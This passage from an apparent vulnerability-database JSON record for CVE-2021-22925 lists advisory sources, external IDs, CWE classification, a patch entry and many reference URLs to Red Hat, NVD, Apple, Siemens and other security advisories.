to:\n\nhttps://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution\n2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport)\n2006842 - MigCluster CR remains in \"unready\" state and source registry is inaccessible after temporary shutdown of source cluster\n2007429 - \"oc describe\" and \"oc log\" commands on \"Migration resources\" tree cannot be copied after failed migration\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n\n5. Solution:\n\nSee the Red Hat OpenShift Container Platform 4.6 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index\nSee the Red Hat OpenShift Container Platform 4.7 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index\nSee the Red Hat OpenShift Container Platform 4.8 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index\nSee the Red Hat OpenShift Container Platform 4.9 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-22925"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763"
      },
      {
        "db": "VULHUB",
        "id": "VHN-381399"
      },
      {
        "db": "PACKETSTORM",
        "id": "165286"
      },
      {
        "db": "PACKETSTORM",
        "id": "165287"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "166489"
      },
      {
        "db": "PACKETSTORM",
        "id": "164249"
      },
      {
        "db": "PACKETSTORM",
        "id": "164246"
      },
      {
        "db": "PACKETSTORM",
        "id": "165129"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      },
      {
        "db": "PACKETSTORM",
        "id": "165862"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-22925",
        "trust": 3.6
      },
      {
        "db": "HACKERONE",
        "id": "1223882",
        "trust": 1.9
      },
      {
        "db": "SIEMENS",
        "id": "SSA-389290",
        "trust": 1.1
      },
      {
        "db": "SIEMENS",
        "id": "SSA-484086",
        "trust": 1.1
      },
      {
        "db": "JVN",
        "id": "JVNVU91709091",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU99030761",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-069-09",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "165862",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "165099",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "166489",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "165129",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "170303",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "165096",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165135",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165209",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166051",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166308",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165633",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165002",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164886",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165758",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166309",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-381399",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165286",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165287",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164249",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164246",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-381399"
      },
      {
        "db": "PACKETSTORM",
        "id": "165286"
      },
      {
        "db": "PACKETSTORM",
        "id": "165287"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "166489"
      },
      {
        "db": "PACKETSTORM",
        "id": "164249"
      },
      {
        "db": "PACKETSTORM",
        "id": "164246"
      },
      {
        "db": "PACKETSTORM",
        "id": "165129"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      },
      {
        "db": "PACKETSTORM",
        "id": "165862"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22925"
      }
    ]
  },
  "id": "VAR-202108-2221",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-381399"
      }
    ],
    "trust": 0.7003805
  },
  "last_update_date": "2026-03-09T20:13:33.055000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Oracle\u00a0Critical\u00a0Patch\u00a0Update\u00a0Advisory\u00a0-\u00a0October\u00a02021 Siemens Siemens\u00a0Security\u00a0Advisory",
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRUCW2UVNYUDZF72DQLFQR4PJEC6CF7V/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-908",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-200",
        "trust": 1.0
      },
      {
        "problemtype": "Use of uninitialized resources (CWE-908) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-381399"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22925"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.9,
        "url": "https://hackerone.com/reports/1223882"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
      },
      {
        "trust": 1.2,
        "url": "https://security.gentoo.org/glsa/202212-01"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-484086.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20210902-0003/"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/kb/ht212804"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/kb/ht212805"
      },
      {
        "trust": 1.1,
        "url": "http://seclists.org/fulldisclosure/2021/sep/39"
      },
      {
        "trust": 1.1,
        "url": "http://seclists.org/fulldisclosure/2021/sep/40"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/frucw2uvnyudzf72dqlfqr4pjec6cf7v/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu91709091/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu99030761/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-069-09"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.6,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-27645"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-33574"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-35942"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-20266"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3712"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-14145"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2018-20673"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.3,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35522"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35524"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-43527"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35521"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35524"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3778"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35522"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-37136"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-44228"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36331"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31535"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35523"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36330"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36332"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-37137"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-21409"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3481"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35523"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3796"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36330"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35521"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30830"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30832"
      },
      {
        "trust": 0.2,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30828"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0340"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30841"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30855"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30843"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30844"
      },
      {
        "trust": 0.2,
        "url": "https://support.apple.com/downloads/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30859"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30829"
      },
      {
        "trust": 0.2,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30857"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30850"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30865"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30827"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30847"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30842"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30860"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-39293"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-29923"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27645"
      },
      {
        "trust": 0.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/frucw2uvnyudzf72dqlfqr4pjec6cf7v/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:5128"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20317"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43267"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36331"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:5127"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-36084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23219"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1081"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24407"
      },
      {
        "trust": 0.1,
        "url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3999"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-31566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23308"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3521"
      },
      {
        "trust": 0.1,
        "url": "https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9."
      },
      {
        "trust": 0.1,
        "url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/."
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43565"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3521"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23806"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29622"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/ht212805."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30783"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30713"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30835"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30858"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30853"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30845"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/ht212804."
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23343"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27304"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32690"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3749"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4902"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23343"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27304"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3801"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33938"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3757"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33930"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33928"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4848"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-37750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22947"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3948"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3733"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33929"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36222"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3620"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22946"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0434"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33574"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29923"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-38297"
